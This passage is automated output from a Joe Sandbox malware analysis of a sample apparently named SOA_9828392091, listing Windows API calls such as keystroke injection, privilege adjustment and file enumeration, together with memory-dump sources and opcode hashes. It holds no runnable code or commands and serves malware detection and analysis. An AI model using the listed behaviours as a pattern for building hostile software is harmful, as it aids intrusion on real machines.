                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: c388ee02337fe7953939a1cc04db11ceccd53448e6194226e668c919c5e2dede
                                      • Instruction ID: 6a0eef3b0b30bebfa8506a06c961d97a46737f3e0ad26b564444792a63242b00
                                      • Opcode Fuzzy Hash: c388ee02337fe7953939a1cc04db11ceccd53448e6194226e668c919c5e2dede
                                      • Instruction Fuzzy Hash: 46F01D76A19209BFDF04DFE4DD89AEEBBBCEF08211F104569A602E2191E2709A449B10
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • GetParent.USER32(?), ref: 009AE5B2
                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0094B1E8,?,?,?,00000006,?), ref: 009AE62C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogNtdllParentProc_
                                      • String ID:
                                      • API String ID: 314495775-0
                                      • Opcode ID: b6bc740ecd4d2dedcbec5fbd86f996a02a6298bfd71230568660b85df159025c
                                      • Instruction ID: b5bc31ded5ebbdbd5bd9bbc0254dc08b57afa2d28a3735fb96df1a2671437ccc
                                      • Opcode Fuzzy Hash: b6bc740ecd4d2dedcbec5fbd86f996a02a6298bfd71230568660b85df159025c
                                      • Instruction Fuzzy Hash: 4B218234606104AFCF248F2DDC85DB93BAAAB4A328F184252F6154B2E2D730DD11DB90
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097F599
                                      • FindClose.KERNEL32(00000000), ref: 0097F5C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 3bdfc01bba7ea7104a65f82799005b5eb19555c7f2e16f9b61f2af685231a69d
                                      • Instruction ID: 4df5d87af1f81585129c2640d28f5c85876e3b82ec79860d48b8b3f4cfef6b47
                                      • Opcode Fuzzy Hash: 3bdfc01bba7ea7104a65f82799005b5eb19555c7f2e16f9b61f2af685231a69d
                                      • Instruction Fuzzy Hash: 3711C4726042009FD704EF28D885A2EB3E8FF84325F00895EF8A9D7291DB30BD008B91
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,009AE44F,?,?,?), ref: 0099F344
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0099F32A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                      • String ID:
                                      • API String ID: 1273190321-0
                                      • Opcode ID: fb121613200929073830b7a212d9898a2e2859898cdfb275151c3c538b8e064d
                                      • Instruction ID: 4f1d8f7d2ed7e316e1948786820b0b5dc0539ed9fdb87b67950b7dcc6f733b82
                                      • Opcode Fuzzy Hash: fb121613200929073830b7a212d9898a2e2859898cdfb275151c3c538b8e064d
                                      • Instruction Fuzzy Hash: 0101B131205204EBCF219F19DC95F7ABB7AFB89374F184524F9054B2E0C775A812EBA0
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0099F6AC
                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,009AE52B,?,?,?,?,?), ref: 0099F6D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClientDialogNtdllProc_Screen
                                      • String ID:
                                      • API String ID: 3420055661-0
                                      • Opcode ID: ae792dbea2f349b2f4680900a2e30208cf46cf95991555b000e73fc0efa0ded5
                                      • Instruction ID: 104efe6ffa2bc142bc1b1222424f51277243bf17e791ef2457069586c38d0f4f
                                      • Opcode Fuzzy Hash: ae792dbea2f349b2f4680900a2e30208cf46cf95991555b000e73fc0efa0ded5
                                      • Instruction Fuzzy Hash: B6F03A72415218FFEF049F85DD099BEBFB9FF44311F14411AF901A2160D7B1AA51EBA0
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0098BE6A,?,?,00000000,?), ref: 0097CEA7
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0098BE6A,?,?,00000000,?), ref: 0097CEB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 5fe6e4d88350a004764b9358bf42b6584a8941ec0863a900813d8fe0f753ad2d
                                      • Instruction ID: 19097d322f6e49c1cb82a45e17ef520485106517ddb9cda72ee215e28d3da5dd
                                      • Opcode Fuzzy Hash: 5fe6e4d88350a004764b9358bf42b6584a8941ec0863a900813d8fe0f753ad2d
                                      • Instruction Fuzzy Hash: 31F0A771114229FBDB209FA4DC49FEA776DFF08361F008165F919D6181E7309E44CBA0
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00974153
                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00974166
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 8793c712814ec9ff7291db1eb86231d6b14a797d9d68a15f3304ffc497bfae1c
                                      • Instruction ID: 64dcdb9e73cde0857d010cabfb8cd7d66c429c61bfc4eccd084910c9fe1fde13
                                      • Opcode Fuzzy Hash: 8793c712814ec9ff7291db1eb86231d6b14a797d9d68a15f3304ffc497bfae1c
                                      • Instruction Fuzzy Hash: 43F0907181434DAFDB059FA0C805BBE7FB4EF10315F008409F96596192D7B9C612DFA0
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0096ACC0), ref: 0096AB99
                                      • CloseHandle.KERNEL32(?,?,0096ACC0), ref: 0096ABAB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: f5f0b5b484d0b9e1a76099efafeeaa051d1d237cfaaf5bdec5472c7632a36a85
                                      • Instruction ID: ab7268b28fffe596fb926b3592781cbcbb133f74270ca52433bfa1e91f964378
                                      • Opcode Fuzzy Hash: f5f0b5b484d0b9e1a76099efafeeaa051d1d237cfaaf5bdec5472c7632a36a85
                                      • Instruction Fuzzy Hash: EDE08631014511AFE7252F24EC04E7777EDEF043307108529F45980430D7225C90DB50
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0099F7CB
                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,009AE4AA,?,?,?,?), ref: 0099F7F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 77d9c92fe0b3356e9ba30a7717e43d5126df181d384cd66a546741a509704576
                                      • Instruction ID: 3157c220474ecb905b84a20d47b4964902ffe019bedc0252eb59dbea43cc06d1
                                      • Opcode Fuzzy Hash: 77d9c92fe0b3356e9ba30a7717e43d5126df181d384cd66a546741a509704576
                                      • Instruction Fuzzy Hash: 39E08C30108219BBEB240F0DDC2AFB93B18EB00B60F108629F95A984E0E7B09890E660
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00956DB3,-0000031A,?,?,00000001), ref: 009581B1
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009581BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 912c936a1bfe871e89e03c12b922311fe144087bf1e0d72674a2898791229616
                                      • Instruction ID: 6e1c4a97f6e59f97b32f78d24ed37bd7f877f0e89ae853c5df092ad97381d991
                                      • Opcode Fuzzy Hash: 912c936a1bfe871e89e03c12b922311fe144087bf1e0d72674a2898791229616
                                      • Instruction Fuzzy Hash: A8B09231059608ABDB002BA1ED09B587FA8EB0866AF044120F60D44062AB735510AB92
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: c3e2c17a6e80aabd69e4ceb3fbdb8d8b7f572c5a8f4f587a81c3092eb0004678
                                      • Instruction ID: 967ad5aaf3249f82d891dc338e9926d611183151c395c8275e304da27927d40d
                                      • Opcode Fuzzy Hash: c3e2c17a6e80aabd69e4ceb3fbdb8d8b7f572c5a8f4f587a81c3092eb0004678
                                      • Instruction Fuzzy Hash: F6A24BB0E04219CFDB24CF98C5906ADB7B5FF49324F2581A9E859AB390D7349E81DF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::exception::exception
                                      • String ID: @
                                      • API String ID: 3728558374-2766056989
                                      • Opcode ID: 108a8eeea271d88bf05632794eba6ef2fb68378399dabc90a64744b4058efeed
                                      • Instruction ID: f41bc83873309cd46d0337a04806004a1af8dcbb67e7fcf72a96742e6af2f662
                                      • Opcode Fuzzy Hash: 108a8eeea271d88bf05632794eba6ef2fb68378399dabc90a64744b4058efeed
                                      • Instruction Fuzzy Hash: 7F72BE71E04209AFDF14DFA4C881FAEB7B9EF89300F14C459E915AB291D734AE45CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87115979c6ccce1297230eb5dee45f4d4dd43507d43e8c52f52417e29f5dad47
                                      • Instruction ID: 919ace74e467a6d3014958c8f93baf24ddfa569ae483522012dd81b105605d0b
                                      • Opcode Fuzzy Hash: 87115979c6ccce1297230eb5dee45f4d4dd43507d43e8c52f52417e29f5dad47
                                      • Instruction Fuzzy Hash: 23320321D2AF014DD7239635C872336A29CAFB73D5F15D727E81AB59AAEF29C4C35200
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: 62d115a0f374b1f3c56430a0a449c31029fae26178deb2ba21ef4e9902179edb
                                      • Instruction ID: ade15ad3ca0e871ca7c31793cc6517a2216b90c09f766d7e949e5710f4564bd8
                                      • Opcode Fuzzy Hash: 62d115a0f374b1f3c56430a0a449c31029fae26178deb2ba21ef4e9902179edb
                                      • Instruction Fuzzy Hash: 2C2266B16083019FD724DF28C891B6BB7E8BF85310F10491DF99A9B291DBB5E944CF92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f0d934b98babd19f0dab715d4ee2c9e04237d43345c0a363fdbb3458c052c5
                                      • Instruction ID: 35fa49e4d54bb7134774d926d7be5d8eec8862e6aef6c59da214d4ec46ef997c
                                      • Opcode Fuzzy Hash: e1f0d934b98babd19f0dab715d4ee2c9e04237d43345c0a363fdbb3458c052c5
                                      • Instruction Fuzzy Hash: 25B1DF20D3AF414DD32396398871336B65CAFBB2D5B92D71BFC1AB4D62EB2295C35180
                                      APIs
                                      • __time64.LIBCMT ref: 0097B6DF
                                        • Part of subcall function 0095344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0097BDC3,00000000,?,?,?,?,0097BF70,00000000,?), ref: 00953453
                                        • Part of subcall function 0095344A: __aulldiv.LIBCMT ref: 00953473
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem__aulldiv__time64
                                      • String ID:
                                      • API String ID: 2893107130-0
                                      • Opcode ID: d2656040ba5dfcdc816842dcdb6f6426ca84b053b06584ef90b341e67e6a88f0
                                      • Instruction ID: c05a278b42bbadb09537d1b0364a54604a50ee776c394682d2630cf8e07e2adb
                                      • Opcode Fuzzy Hash: d2656040ba5dfcdc816842dcdb6f6426ca84b053b06584ef90b341e67e6a88f0
                                      • Instruction Fuzzy Hash: B72172726345108BC729CF28C491B62B7E5EB95320B64CE6DE4E9CF2C0CB78BA05DB54
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 009A04F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: a380c4756e6f41e6fd613fcb884506571895cbe4d7977fe72f897ea765442c59
                                      • Instruction ID: 314e12ecd60a905584e915c546a7442429f55bf2dab8dce046f448074139ff6d
                                      • Opcode Fuzzy Hash: a380c4756e6f41e6fd613fcb884506571895cbe4d7977fe72f897ea765442c59
                                      • Instruction Fuzzy Hash: 6E110630204215BAFF249B2CCD15F7D3A98EBCBB20F208718FA125A1F2DA685D10A2D4
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,009AE467,?,?,?,?,00000000,?), ref: 009A0127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
